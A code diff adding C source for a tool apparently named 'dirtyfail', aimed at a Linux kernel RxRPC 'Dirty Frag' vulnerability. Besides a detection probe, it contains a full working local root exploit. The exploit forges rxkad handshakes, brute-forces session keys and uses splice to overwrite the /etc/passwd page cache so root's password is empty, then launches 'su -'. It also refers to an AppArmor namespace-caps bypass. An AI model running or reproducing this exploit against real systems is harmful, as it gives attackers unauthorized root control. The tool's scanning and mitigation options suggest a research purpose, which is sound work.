+/* sockaddr_rxrpc is in <linux/rxrpc.h>; fallback below.
+ *
+ * IMPORTANT: the kernel's struct sockaddr_rxrpc has the transport union
+ * sized to include sockaddr_in6 (28 B), making the total 36 B. The
+ * rxrpc_bind() syscall rejects with -EINVAL if len < sizeof(struct
+ * sockaddr_rxrpc), so even when we only use the v4 path we MUST send
+ * 36 bytes — hence the in6 member below. */
+struct dfr_sockaddr_rxrpc {
+    uint16_t srx_family;
+    uint16_t srx_service;
+    uint16_t transport_type;
+    uint16_t transport_len;
+    union {
+        uint16_t family;
+        struct sockaddr_in sin;
+        struct sockaddr_in6 sin6;
+    } transport;
+};
+
+/* AF_ALG IV control message header. */
+struct dfr_af_alg_iv {
+    uint32_t ivlen;
+    uint8_t iv[8];
+} __attribute__((packed));
+
+/* ---------------------------------------------------------------- *
+ * Detection: precondition probe. Returns DF_PRECOND_FAIL, DF_VULNERABLE, or the --active probe verdict.
+ * ---------------------------------------------------------------- */
+
+df_result_t dirtyfrag_rxrpc_detect(void)
+{
+    log_step("Dirty Frag — RxRPC variant (CVE-2026-43500) — detection");
+
+    int km = -1, kn = -1;
+    if (kernel_version(&km, &kn))
+        log_hint("kernel %d.%d.x", km, kn);
+
+    bool rxrpc = kmod_loaded("rxrpc");
+    log_hint("rxrpc currently loaded: %s", rxrpc ? "yes" : "no");
+
+    int s = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); /* 3rd arg is the transport family; protocol 0 is refused (EPROTONOSUPPORT) on kernels with rxrpc IPv6 support, which made this probe read "denied" on usable systems */
+    bool can_open = (s >= 0);
+    if (can_open) close(s);
+    log_hint("AF_RXRPC socket: %s", can_open ? "openable" : "denied");
+
+    if (!rxrpc && !can_open) { /* neither signal present: report the variant as unreachable */
+        log_ok("rxrpc not present and AF_RXRPC socket family rejected — "
+               "RxRPC variant unreachable");
+        return DF_PRECOND_FAIL;
+    }
+
+    /* The RxRPC trigger needs to register an rxrpc key + open AF_RXRPC
+     * socket inside a userns with caps. If caps are stripped, fail out. */
+    if (apparmor_userns_caps_blocked()) {
+        log_ok("LSM-mitigated — unprivileged userns has no caps, RxRPC trigger "
+               "cannot register session keys or open AF_RXRPC.");
+        return DF_PRECOND_FAIL;
+    }
+
+    if (dirtyfail_active_probes) {
+        log_step("--active set: firing rxkad handshake-forgery trigger against /tmp sentinel");
+        df_result_t pr = dirtyfrag_rxrpc_active_probe();
+        if (pr == DF_VULNERABLE || pr == DF_OK || pr == DF_PRECOND_FAIL) return pr; /* conclusive verdicts win; anything else falls through */
+        log_warn("active probe inconclusive — falling back to precondition verdict");
+    }
+
+    log_warn("VULNERABLE — RxRPC variant of Dirty Frag is reachable");
+    log_warn("apply mitigation: `dirtyfail --mitigate` (blacklists rxrpc + others)");
+    log_warn("or manually: blacklist rxrpc + drop_caches");
+    log_hint("re-run with `--scan --active` for an empirical sentinel-STORE probe");
+    return DF_VULNERABLE;
+}
+
+/* ================================================================ *
+ * Exploit (Linux-only; macOS gets a stub at the bottom).
+ * ================================================================ */ + +#ifdef __linux__ + +extern ssize_t splice(int fd_in, loff_t *off_in, int fd_out, + loff_t *off_out, size_t len, unsigned int flags); +extern ssize_t vmsplice(int fd, const struct iovec *iov, unsigned long nr, + unsigned int flags); + +/* ---- /proc helpers --------------------------------------------------- */ + +static bool write_proc_str(const char *path, const char *value) +{ + int fd = open(path, O_WRONLY); + if (fd < 0) return false; + ssize_t want = (ssize_t)strlen(value); + ssize_t got = write(fd, value, want); + close(fd); + return got == want; +} + +/* ---- userns / netns setup ------------------------------------------- */ + +__attribute__((unused)) +static bool setup_userns(uid_t real_uid, gid_t real_gid) +{ + if (syscall(SYS_unshare, CLONE_NEWUSER | CLONE_NEWNET) < 0) { + log_bad("unshare(USER|NET): %s", strerror(errno)); + return false; + } + write_proc_str("/proc/self/setgroups", "deny"); + char buf[64]; + snprintf(buf, sizeof(buf), "%u %u 1", (unsigned)real_uid, (unsigned)real_uid); + if (!write_proc_str("/proc/self/uid_map", buf)) { + log_bad("uid_map: %s", strerror(errno)); + return false; + } + snprintf(buf, sizeof(buf), "%u %u 1", (unsigned)real_gid, (unsigned)real_gid); + if (!write_proc_str("/proc/self/gid_map", buf)) { + log_bad("gid_map: %s", strerror(errno)); + return false; + } + /* Bring lo up so loopback works inside the new netns. */ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return false; + struct ifreq ifr; + memset(&ifr, 0, sizeof(ifr)); + strncpy(ifr.ifr_name, "lo", IFNAMSIZ - 1); + if (ioctl(s, SIOCGIFFLAGS, &ifr) == 0) { + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(s, SIOCSIFFLAGS, &ifr); + } + close(s); + return true; +} + +/* ---- RxRPC v1 token build ------------------------------------------- * + * + * The kernel parses an RxRPC v1 token as a sequence of XDR-encoded + * fields (all big-endian uint32, strings padded to 4-byte boundaries). 
+ * + * flags u32 + * cell_name XDR string + * ntoken u32 + * token[ntoken] = { + * len u32 (length of the rest of the token) + * sec_ix u32 (=2 for RXKAD) + * vice_id u32 + * kvno u32 + * session_key u8[8] ← THE KEY WE BRUTE-FORCED + * issued u32 + * expires u32 + * primary_flag u32 + * ticket_len u32 + * ticket u8[ticket_len] + * } + */ + +static int build_rxrpc_v1_token(uint8_t *out, size_t maxlen, + const uint8_t key[8]) +{ + uint8_t *p = out; + uint8_t *end = out + maxlen; + + /* Helper to bounds-check before each write. */ + #define NEED(n) do { if (p + (n) > end) { errno = E2BIG; return -1; } } while (0) + + uint32_t now = (uint32_t)time(NULL); + uint32_t expires = now + 86400; + + NEED(4); *(uint32_t *)p = htonl(0); p += 4; /* flags */ + + const char *cell = "evil"; + uint32_t clen = (uint32_t)strlen(cell); + uint32_t pad = (4 - (clen & 3)) & 3; + NEED(4 + clen + pad); + *(uint32_t *)p = htonl(clen); p += 4; + memcpy(p, cell, clen); + memset(p + clen, 0, pad); + p += clen + pad; + + NEED(4); *(uint32_t *)p = htonl(1); p += 4; /* ntoken */ + + uint8_t *toklen_slot = p; + NEED(4); p += 4; /* will fill below */ + uint8_t *tokstart = p; + + NEED(4); *(uint32_t *)p = htonl(2); p += 4; /* sec_ix = RXKAD */ + NEED(4); *(uint32_t *)p = htonl(0); p += 4; /* vice_id */ + NEED(4); *(uint32_t *)p = htonl(1); p += 4; /* kvno */ + NEED(8); memcpy(p, key, 8); p += 8; /* session_key */ + NEED(4); *(uint32_t *)p = htonl(now); p += 4; /* issued */ + NEED(4); *(uint32_t *)p = htonl(expires); p += 4; /* expires */ + NEED(4); *(uint32_t *)p = htonl(1); p += 4; /* primary_flag */ + NEED(4); *(uint32_t *)p = htonl(8); p += 4; /* ticket_len */ + NEED(8); memset(p, 0xCC, 8); p += 8; /* ticket (any bytes) */ + + *(uint32_t *)toklen_slot = htonl((uint32_t)(p - tokstart)); + + return (int)(p - out); + #undef NEED +} + +static long add_rxrpc_key(const char *desc, const uint8_t key[8]) +{ + uint8_t buf[256]; + int n = build_rxrpc_v1_token(buf, sizeof(buf), key); + if (n < 0) return -1; 
+ return syscall(SYS_add_key, "rxrpc", desc, buf, (size_t)n, + KEY_SPEC_PROCESS_KEYRING); +} + +/* ---- AF_ALG pcbc(fcrypt) helpers ------------------------------------ * + * + * Used to compute the rxkad packet checksum. The kernel does: + * + * csum_iv = high 8 bytes of PCBC-encrypt({epoch, cid, 0, sec_ix}, + * IV = session_key) + * cksum_h = (PCBC-encrypt({call_id, x}, IV = csum_iv)[1] >> 16) | 1 + * where x = (cid_low2 << 30) | (seq & 0x3fffffff) + * + * We could roll this in user space using fcrypt directly (no AF_ALG), + * but using AF_ALG is simpler and exactly matches what the kernel does + * β€” useful for catching protocol drift across kernel versions. + */ + +static int alg_open_pcbc_fcrypt(const uint8_t key[8]) +{ + int s = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (s < 0) return -1; + struct sockaddr_alg_compat sa = { .salg_family = AF_ALG }; + strncpy((char *)sa.salg_type, "skcipher", sizeof(sa.salg_type) - 1); + strncpy((char *)sa.salg_name, "pcbc(fcrypt)", sizeof(sa.salg_name) - 1); + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(s); return -1; + } + if (setsockopt(s, SOL_ALG, ALG_SET_KEY, key, 8) < 0) { + close(s); return -1; + } + return s; +} + +static int alg_pcbc_run(int alg_s, int op, const uint8_t iv[8], + const void *in, size_t inlen, void *out) +{ + int op_fd = accept(alg_s, NULL, NULL); + if (op_fd < 0) return -1; + + char cbuf[CMSG_SPACE(sizeof(int)) + + CMSG_SPACE(sizeof(struct dfr_af_alg_iv))] = {0}; + struct msghdr msg = { .msg_control = cbuf, .msg_controllen = sizeof(cbuf) }; + + struct cmsghdr *c = CMSG_FIRSTHDR(&msg); + c->cmsg_level = SOL_ALG; + c->cmsg_type = ALG_SET_OP; + c->cmsg_len = CMSG_LEN(sizeof(int)); + *(int *)CMSG_DATA(c) = op; + + c = CMSG_NXTHDR(&msg, c); + c->cmsg_level = SOL_ALG; + c->cmsg_type = ALG_SET_IV; + c->cmsg_len = CMSG_LEN(sizeof(struct dfr_af_alg_iv)); + struct dfr_af_alg_iv *aiv = (struct dfr_af_alg_iv *)CMSG_DATA(c); + aiv->ivlen = 8; + memcpy(aiv->iv, iv, 8); + + struct iovec iov = { 
.iov_base = (void *)in, .iov_len = inlen }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + + if (sendmsg(op_fd, &msg, 0) < 0) { close(op_fd); return -1; } + ssize_t n = read(op_fd, out, inlen); + close(op_fd); + return n == (ssize_t)inlen ? 0 : -1; +} + +static int compute_csum_iv(uint32_t epoch, uint32_t cid, uint32_t sec_ix, + const uint8_t key[8], uint8_t out[8]) +{ + int s = alg_open_pcbc_fcrypt(key); + if (s < 0) return -1; + uint32_t in[4] = { htonl(epoch), htonl(cid), 0, htonl(sec_ix) }; + uint8_t enc[16]; + int rc = alg_pcbc_run(s, ALG_OP_ENCRYPT, key, in, 16, enc); + close(s); + if (rc < 0) return -1; + memcpy(out, enc + 8, 8); + return 0; +} + +static int compute_cksum(uint32_t cid, uint32_t call_id, uint32_t seq, + const uint8_t key[8], const uint8_t csum_iv[8], + uint16_t *out_h) +{ + int s = alg_open_pcbc_fcrypt(key); + if (s < 0) return -1; + uint32_t x = ((cid & RXRPC_CHANNELMASK) << (32 - RXRPC_CIDSHIFT)) + | (seq & 0x3fffffff); + uint32_t in[2] = { htonl(call_id), htonl(x) }; + uint32_t enc[2]; + int rc = alg_pcbc_run(s, ALG_OP_ENCRYPT, csum_iv, in, 8, enc); + close(s); + if (rc < 0) return -1; + uint16_t v = (uint16_t)((ntohl(enc[1]) >> 16) & 0xffff); + if (v == 0) v = 1; + *out_h = v; + return 0; +} + +/* ---- AF_RXRPC client ------------------------------------------------- */ + +static int setup_rxrpc_client(uint16_t local_port, const char *keyname) +{ + int fd = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); + if (fd < 0) { + log_bad("socket(AF_RXRPC): %s", strerror(errno)); + return -1; + } + + if (setsockopt(fd, SOL_RXRPC, RXRPC_SECURITY_KEY, + keyname, strlen(keyname)) < 0) { + log_bad("setsockopt RXRPC_SECURITY_KEY: %s", strerror(errno)); + close(fd); return -1; + } + + int level = RXRPC_SECURITY_AUTH; + if (setsockopt(fd, SOL_RXRPC, RXRPC_MIN_SECURITY_LEVEL, + &level, sizeof(level)) < 0) { + log_bad("setsockopt RXRPC_MIN_SECURITY_LEVEL: %s", strerror(errno)); + close(fd); return -1; + } + + struct dfr_sockaddr_rxrpc srx; + memset(&srx, 0, 
sizeof(srx)); + srx.srx_family = AF_RXRPC; + srx.srx_service = 0; + srx.transport_type= SOCK_DGRAM; + srx.transport_len = sizeof(struct sockaddr_in); + srx.transport.sin.sin_family = AF_INET; + srx.transport.sin.sin_port = htons(local_port); + srx.transport.sin.sin_addr.s_addr = htonl(0x7f000001); + if (bind(fd, (struct sockaddr *)&srx, sizeof(srx)) < 0) { + log_bad("bind AF_RXRPC :%u: %s", local_port, strerror(errno)); + close(fd); return -1; + } + return fd; +} + +static int rxrpc_initiate_call(int fd, uint16_t srv_port, + uint16_t svc_id, unsigned long user_call_id) +{ + /* Wire payload β€” fixed 8 bytes, not C-string semantics. */ + char data[8] = { 'P','I','N','G','P','I','N','G' }; + struct dfr_sockaddr_rxrpc srx; + memset(&srx, 0, sizeof(srx)); + srx.srx_family = AF_RXRPC; + srx.srx_service = svc_id; + srx.transport_type= SOCK_DGRAM; + srx.transport_len = sizeof(struct sockaddr_in); + srx.transport.sin.sin_family = AF_INET; + srx.transport.sin.sin_port = htons(srv_port); + srx.transport.sin.sin_addr.s_addr = htonl(0x7f000001); + + char cmsg_buf[CMSG_SPACE(sizeof(unsigned long))]; + struct msghdr msg = { .msg_name = &srx, .msg_namelen = sizeof(srx) }; + struct iovec iov = { .iov_base = data, .iov_len = sizeof(data) }; + msg.msg_iov = &iov; msg.msg_iovlen = 1; + msg.msg_control = cmsg_buf; msg.msg_controllen = sizeof(cmsg_buf); + struct cmsghdr *cm = CMSG_FIRSTHDR(&msg); + cm->cmsg_level = SOL_RXRPC; + cm->cmsg_type = RXRPC_USER_CALL_ID; + cm->cmsg_len = CMSG_LEN(sizeof(unsigned long)); + *(unsigned long *)CMSG_DATA(cm) = user_call_id; + + int fl = fcntl(fd, F_GETFL); + fcntl(fd, F_SETFL, fl | O_NONBLOCK); + ssize_t n = sendmsg(fd, &msg, 0); + fcntl(fd, F_SETFL, fl); + if (n < 0 && errno != EAGAIN && errno != EWOULDBLOCK) return -1; + return 0; +} + +/* ---- UDP fake-server ------------------------------------------------ */ + +static int setup_udp_server(uint16_t port) +{ + int s = socket(AF_INET, SOCK_DGRAM, 0); + if (s < 0) return -1; + struct sockaddr_in 
sa = { + .sin_family = AF_INET, + .sin_port = htons(port), + .sin_addr.s_addr = htonl(0x7f000001), + }; + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) { + close(s); return -1; + } + return s; +} + +static ssize_t udp_recv_to(int s, void *buf, size_t cap, + struct sockaddr_in *from, int timeout_ms) +{ + struct pollfd pfd = { .fd = s, .events = POLLIN }; + if (poll(&pfd, 1, timeout_ms) <= 0) return -1; + socklen_t fl = from ? sizeof(*from) : 0; + return recvfrom(s, buf, cap, 0, + (struct sockaddr *)from, from ? &fl : NULL); +} + +/* ---- one trigger ---------------------------------------------------- * + * + * Run exactly one 8-byte STORE at file offset `splice_off` of `target_fd`, + * using the rxkad session key `key`. Sequence: + * + * 1. add_key("rxrpc", "evil", v1_token{session_key=key}) + * 2. udp_srv = bind 127.0.0.1:port_S + * 3. rxsk_cli = AF_RXRPC + SECURITY_KEY=evil + bind :port_C + * 4. rxsk_cli sendmsg β†’ triggers handshake β†’ udp_srv receives first packet + * 5. extract (epoch, cid, callN) from that packet + * 6. udp_srv sends forged CHALLENGE β†’ rxsk_cli auto-RESPONSE + * 7. compute csum_iv, cksum with `key` + * 8. build malicious DATA wire header + * 9. pipe(); vmsplice(hdr); splice(target@splice_off, 8B); splice(pipe β†’ udp_srv) + * 10. recvmsg(rxsk_cli) drives kernel through verify_packet β†’ in-place STORE + */ + +static int g_trigger_seq = 0; + +static bool do_one_trigger(int target_fd, off_t splice_off, + const uint8_t key[8]) +{ + char keyname[32]; + snprintf(keyname, sizeof(keyname), "df-evil%d", g_trigger_seq++); + + long key_id = add_rxrpc_key(keyname, key); + if (key_id < 0) { + log_bad("add_rxrpc_key: %s", strerror(errno)); + return false; + } + + /* Use varying ports so kernel TIME_WAIT / stale state doesn't bite. 
*/ + uint16_t port_S = (uint16_t)(7777 + (g_trigger_seq * 2 % 200)); + uint16_t port_C = (uint16_t)(port_S + 1); + uint16_t svc_id = 1234; + + int udp_srv = setup_udp_server(port_S); + if (udp_srv < 0) { log_bad("udp server"); return false; } + + int rxsk = setup_rxrpc_client(port_C, keyname); + if (rxsk < 0) { log_bad("rxrpc client"); close(udp_srv); return false; } + + if (rxrpc_initiate_call(rxsk, port_S, svc_id, 0xDEAD) < 0) { + log_bad("initiate call"); + close(rxsk); close(udp_srv); return false; + } + + /* Receive first packet from rxsk_cli β€” this is the kernel's + * implicit DATA-0 (handshake init). It carries epoch + cid. */ + uint8_t pkt[2048]; + struct sockaddr_in cli_addr; + ssize_t n = udp_recv_to(udp_srv, pkt, sizeof(pkt), &cli_addr, 1500); + if (n < (ssize_t)sizeof(struct rxrpc_wire_hdr)) { + log_bad("no handshake packet (n=%zd)", n); + close(rxsk); close(udp_srv); return false; + } + struct rxrpc_wire_hdr *whdr = (struct rxrpc_wire_hdr *)pkt; + uint32_t epoch = ntohl(whdr->epoch); + uint32_t cid = ntohl(whdr->cid); + uint32_t callN = ntohl(whdr->callNumber); + uint16_t svc_in = ntohs(whdr->serviceId); + uint16_t cliport= ntohs(cli_addr.sin_port); + + /* Send forged CHALLENGE so the client emits RESPONSE and primes + * conn->rxkad.cipher with our session key. 
*/ + { + struct { + struct rxrpc_wire_hdr hdr; + struct rxkad_challenge_payload ch; + } __attribute__((packed)) c; + memset(&c, 0, sizeof(c)); + c.hdr.epoch = htonl(epoch); + c.hdr.cid = htonl(cid); + c.hdr.serial = htonl(0x10000); + c.hdr.type = RXRPC_PKT_CHALLENGE; + c.hdr.securityIndex = 2; + c.hdr.serviceId = htons(svc_in); + c.ch.version = htonl(2); + c.ch.nonce = htonl(0xdeadbeefu); + c.ch.min_level = htonl(1); + + struct sockaddr_in to = { + .sin_family = AF_INET, + .sin_port = htons(cliport), + .sin_addr.s_addr = htonl(0x7f000001), + }; + if (sendto(udp_srv, &c, sizeof(c), 0, + (struct sockaddr *)&to, sizeof(to)) < 0) { + log_bad("send CHALLENGE: %s", strerror(errno)); + close(rxsk); close(udp_srv); return false; + } + } + + /* Drain whatever RESPONSE / further packets the client emits. */ + for (int i = 0; i < 4; i++) { + struct sockaddr_in src; + if (udp_recv_to(udp_srv, pkt, sizeof(pkt), &src, 500) < 0) break; + } + + /* Compute csum_iv + wire cksum with our session key. */ + uint8_t csum_iv[8]; + if (compute_csum_iv(epoch, cid, 2, key, csum_iv) < 0) { + log_bad("compute_csum_iv"); + close(rxsk); close(udp_srv); return false; + } + uint16_t cksum_h = 0; + if (compute_cksum(cid, callN, 1, key, csum_iv, &cksum_h) < 0) { + log_bad("compute_cksum"); + close(rxsk); close(udp_srv); return false; + } + + /* Build malicious DATA wire header. */ + struct rxrpc_wire_hdr mal; + memset(&mal, 0, sizeof(mal)); + mal.epoch = htonl(epoch); + mal.cid = htonl(cid); + mal.callNumber = htonl(callN); + mal.seq = htonl(1); + mal.serial = htonl(0x42000); + mal.type = RXRPC_PKT_DATA; + mal.flags = RXRPC_LAST_PACKET; + mal.securityIndex = 2; + mal.cksum = htons(cksum_h); + mal.serviceId = htons(svc_in); + + /* connect udp_srv β†’ client port so we can splice. 
*/ + struct sockaddr_in dst = { + .sin_family = AF_INET, + .sin_port = htons(cliport), + .sin_addr.s_addr = htonl(0x7f000001), + }; + if (connect(udp_srv, (struct sockaddr *)&dst, sizeof(dst)) < 0) { + log_bad("connect udp_srv: %s", strerror(errno)); + close(rxsk); close(udp_srv); return false; + } + + /* The actual splice trigger: pipe < hdr ; pipe < file@off,8 ; udp < pipe */ + int p[2]; + if (pipe(p) < 0) { close(rxsk); close(udp_srv); return false; } + { + struct iovec v = { .iov_base = &mal, .iov_len = sizeof(mal) }; + if (vmsplice(p[1], &v, 1, 0) != (ssize_t)sizeof(mal)) { + log_bad("vmsplice: %s", strerror(errno)); + close(p[0]); close(p[1]); + close(rxsk); close(udp_srv); return false; + } + } + { + loff_t off = splice_off; + if (splice(target_fd, &off, p[1], NULL, 8, 0) != 8) { + log_bad("splice file->pipe: %s", strerror(errno)); + close(p[0]); close(p[1]); + close(rxsk); close(udp_srv); return false; + } + } + if (splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + 8, 0) + != (ssize_t)(sizeof(mal) + 8)) { + log_bad("splice pipe->udp: %s", strerror(errno)); + close(p[0]); close(p[1]); + close(rxsk); close(udp_srv); return false; + } + close(p[0]); close(p[1]); + + /* recvmsg drives the kernel through verify_packet and fires the + * in-place STORE. We don't care about the actual data. 
*/ + int fl = fcntl(rxsk, F_GETFL); + fcntl(rxsk, F_SETFL, fl | O_NONBLOCK); + char rb[2048]; + struct dfr_sockaddr_rxrpc rsrx; + char ccb[256]; + for (int round = 0; round < 5; round++) { + struct msghdr m = { .msg_name = &rsrx, .msg_namelen = sizeof(rsrx) }; + struct iovec iv = { .iov_base = rb, .iov_len = sizeof(rb) }; + m.msg_iov = &iv; m.msg_iovlen = 1; + m.msg_control = ccb; m.msg_controllen = sizeof(ccb); + ssize_t r = recvmsg(rxsk, &m, 0); + if (r > 0) break; + if (errno == EAGAIN || errno == EWOULDBLOCK) usleep(20000); + else break; + } + fcntl(rxsk, F_SETFL, fl); + + close(rxsk); + close(udp_srv); + return true; +} + +/* ---- predicates ----------------------------------------------------- */ + +static bool predicate_pa_nullok(const uint8_t P[8]) +{ + /* Want chars 4..5 of /etc/passwd to become "::" β€” empty pwd field. */ + return P[0] == ':' && P[1] == ':'; +} + +static bool predicate_pb_nullok(const uint8_t P[8]) +{ + /* Want chars 6..7 = "0:" (uid=0 with separator). */ + return P[0] == '0' && P[1] == ':'; +} + +static bool predicate_pc_nullok(const uint8_t P[8]) +{ + /* Want chars 8..15 = "0:GGGGG:". G βˆ‰ {':' '\0' '\n'}. */ + if (P[0] != '0' || P[1] != ':' || P[7] != ':') return false; + for (int i = 2; i < 7; i++) + if (P[i] == ':' || P[i] == '\0' || P[i] == '\n') return false; + return true; +} + +/* ---- main exploit --------------------------------------------------- */ + +#define MAX_BRUTE_ITERS_AB (1ULL << 24) /* ~3 ms expected hit, headroom */ +#define MAX_BRUTE_ITERS_C (1ULL << 30) /* ~1 s expected hit, more headroom */ + +df_result_t dirtyfrag_rxrpc_exploit(bool do_shell) +{ + log_step("Dirty Frag (RxRPC) β€” exploit"); + + if (real_uid_for_target() == 0) { + log_warn("already root in init namespace β€” nothing to escalate"); + return DF_OK; + } + + /* Initialize fcrypt and verify the cipher works. 
*/ + fcrypt_init(); + if (!fcrypt_selftest()) { + log_bad("fcrypt selftest FAILED β€” wrong S-boxes or key schedule"); + return DF_TEST_ERROR; + } + log_ok("fcrypt selftest OK"); + + /* The RxRPC variant targets line 1 of /etc/passwd unconditionally + * (it makes root's password empty for PAM nullok). We need the + * 16 bytes at offsets 4..15 of that file to do the brute force. */ + int pfd = open("/etc/passwd", O_RDONLY); + if (pfd < 0) { log_bad("open /etc/passwd: %s", strerror(errno)); return DF_TEST_ERROR; } + + /* Read the page and the original ciphertexts at offsets 4, 6, 8. */ + uint8_t Cline[16]; + if (pread(pfd, Cline, 16, 0) != 16) { + log_bad("pread /etc/passwd: %s", strerror(errno)); + close(pfd); return DF_TEST_ERROR; + } + log_step("/etc/passwd[0..15] = '%.16s'", (char *)Cline); + + uint8_t Ca[8], Cb[8], Cc[8]; + memcpy(Ca, Cline + 4, 8); + memcpy(Cb, Cline + 6, 8); + memcpy(Cc, Cline + 8, 8); + + log_warn("about to:"); + log_warn(" 1. brute-force three rxkad session keys (~1 second total)"); + log_warn(" 2. enter a fresh user/net namespace"); + log_warn(" 3. fire 3 splice triggers against /etc/passwd page cache"); + log_warn(" 4. PAM `pam_unix nullok` will accept empty password for root"); + log_warn("cleanup: dirtyfail --cleanup, or `echo 3 > /proc/sys/vm/drop_caches`"); + if (!typed_confirm("DIRTYFAIL")) { + log_bad("confirmation declined β€” aborting"); + close(pfd); return DF_OK; + } + + /* === Brute force K_A ============================================= */ + uint8_t Ka[8], Pa[8]; + if (!fcrypt_brute_force(Ca, predicate_pa_nullok, MAX_BRUTE_ITERS_AB, + (uint64_t)time(NULL) ^ 0xA1ULL, + "K_A (chars 4..5 = \"::\")", Ka, Pa)) { + log_bad("K_A brute force exhausted"); + close(pfd); return DF_EXPLOIT_FAIL; + } + + /* === Chained-ciphertext correction for K_B ====================== * + * + * After splice A overwrites bytes 4..11 with P_A, splice B at offset 6 + * (length 8) sees: bytes 6..11 = P_A[2..7], bytes 12..13 = original. 
+ */ + uint8_t Cb_actual[8]; + memcpy(Cb_actual, Pa + 2, 6); + memcpy(Cb_actual + 6, Cb + 6, 2); + + /* === Brute force K_B ============================================= */ + uint8_t Kb[8], Pb[8]; + if (!fcrypt_brute_force(Cb_actual, predicate_pb_nullok, MAX_BRUTE_ITERS_AB, + (uint64_t)time(NULL) ^ 0xB2ULL, + "K_B (chars 6..7 = \"0:\")", Kb, Pb)) { + log_bad("K_B brute force exhausted"); + close(pfd); return DF_EXPLOIT_FAIL; + } + + /* === Chained-ciphertext correction for K_C ====================== */ + uint8_t Cc_actual[8]; + memcpy(Cc_actual, Pb + 2, 6); + memcpy(Cc_actual + 6, Cc + 6, 2); + + /* === Brute force K_C ============================================= */ + uint8_t Kc[8], Pc[8]; + if (!fcrypt_brute_force(Cc_actual, predicate_pc_nullok, MAX_BRUTE_ITERS_C, + (uint64_t)time(NULL) ^ 0xC3ULL, + "K_C (chars 8..15 = \"0:GGGGG:\")", Kc, Pc)) { + log_bad("K_C brute force exhausted"); + close(pfd); return DF_EXPLOIT_FAIL; + } + close(pfd); + + log_ok("all three keys found; handing off to bypass child for triggers"); + + /* Pass the three K's to the inner via hex-encoded env vars. The + * inner runs in the AA bypass userns (where add_key + AF_RXRPC + * have CAP_NET_ADMIN); we (parent, init ns) stay here so the + * eventual `su -` reaches REAL init-ns root via PAM nullok. */ + char hex[8 * 2 + 1]; + #define HEXSET(name, k) do { \ + for (int i = 0; i < 8; i++) snprintf(hex + i*2, 3, "%02x", k[i]); \ + setenv(name, hex, 1); \ + } while (0) + HEXSET("DIRTYFAIL_K_A", Ka); + HEXSET("DIRTYFAIL_K_B", Kb); + HEXSET("DIRTYFAIL_K_C", Kc); + #undef HEXSET + setenv("DIRTYFAIL_INNER_MODE", "rxrpc", 1); + + int rc = apparmor_bypass_fork_arm(0, NULL); + if (rc != DF_EXPLOIT_OK) { + log_bad("inner exploit failed (exit=%d)", rc); + return DF_EXPLOIT_FAIL; + } + + /* Verify in init namespace β€” page cache is global. 
*/ + int v = open("/etc/passwd", O_RDONLY); + if (v < 0) { log_bad("verify open: %s", strerror(errno)); return DF_EXPLOIT_FAIL; } + uint8_t after[16]; + ssize_t got = read(v, after, 16); + close(v); + if (got != 16) return DF_EXPLOIT_FAIL; + + log_step("/etc/passwd[0..15] now = '%.16s'", (char *)after); + + if (after[4] != ':' || after[5] != ':') { + log_bad("page cache not in expected shape; trigger may have missed"); + return DF_EXPLOIT_FAIL; + } + log_ok("/etc/passwd page cache: root password field is now empty"); + + if (!do_shell) { + if (try_revert_passwd_page_cache()) + log_ok("page cache reverted (--no-shell)"); + else + log_warn("page cache may still be modified β€” `sudo dirtyfail --cleanup` or reboot"); + return DF_EXPLOIT_OK; + } + + log_ok("invoking 'su -' in init ns β€” PAM nullok accepts empty password β†’ REAL ROOT"); + execlp("su", "su", "-", (char *)NULL); + log_bad("execlp su: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; +} + +/* ---- inner --------------------------------------------------------- + * + * Runs in the AA bypass userns. Reads the three K's from + * DIRTYFAIL_K_{A,B,C} env vars, fires three do_one_trigger calls. + * The fcrypt brute force itself ran in the parent (no caps required). + */ + +static bool hex_to_8b(const char *hex, uint8_t out[8]) +{ + if (!hex || strlen(hex) != 16) return false; + for (int i = 0; i < 8; i++) { + unsigned int b; + if (sscanf(hex + i*2, "%2x", &b) != 1) return false; + out[i] = (uint8_t)b; + } + return true; +} + +df_result_t dirtyfrag_rxrpc_exploit_inner(void) +{ + uint8_t Ka[8], Kb[8], Kc[8]; + if (!hex_to_8b(getenv("DIRTYFAIL_K_A"), Ka) || + !hex_to_8b(getenv("DIRTYFAIL_K_B"), Kb) || + !hex_to_8b(getenv("DIRTYFAIL_K_C"), Kc)) { + log_bad("inner: DIRTYFAIL_K_{A,B,C} not set or invalid"); + return DF_TEST_ERROR; + } + + /* Autoload rxrpc.ko by opening a dummy AF_RXRPC socket. 
*/ + int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); + if (dummy >= 0) close(dummy); + + int t = open("/etc/passwd", O_RDONLY); + if (t < 0) { + log_bad("inner: open passwd: %s", strerror(errno)); + return DF_EXPLOIT_FAIL; + } + + bool ok = do_one_trigger(t, 4, Ka) + && do_one_trigger(t, 6, Kb) + && do_one_trigger(t, 8, Kc); + close(t); + return ok ? DF_EXPLOIT_OK : DF_EXPLOIT_FAIL; +} + +/* ---------------------------------------------------------------- * + * Active probe β€” `--scan --active` path. + * + * Fires ONE forged-handshake trigger against a /tmp sentinel page + * with an arbitrary 8-byte key. We don't try to predict what lands; + * any byte change inside the spliced 8-byte window confirms the + * kernel ran the STORE. + * ---------------------------------------------------------------- */ + +df_result_t dirtyfrag_rxrpc_active_probe_inner(void) +{ + const char *sentinel = getenv("DIRTYFAIL_PROBE_SENTINEL"); + if (!sentinel || !*sentinel) { + log_bad("rxrpc-probe: DIRTYFAIL_PROBE_SENTINEL not set"); + return DF_TEST_ERROR; + } + + int dummy = socket(AF_RXRPC, SOCK_DGRAM, PF_INET); + if (dummy >= 0) close(dummy); + + int t = open(sentinel, O_RDONLY); + if (t < 0) { + log_bad("rxrpc-probe: open %s: %s", sentinel, strerror(errno)); + return DF_TEST_ERROR; + } + + /* Any 8-byte key works for a structural probe β€” we're not + * recovering plaintext, just confirming the STORE fires. */ + static const uint8_t probe_key[8] = { + 0xDE, 0xAD, 0xBE, 0xEF, 0x01, 0x23, 0x45, 0x67 + }; + bool ok = do_one_trigger(t, 0, probe_key); + close(t); + return ok ? 
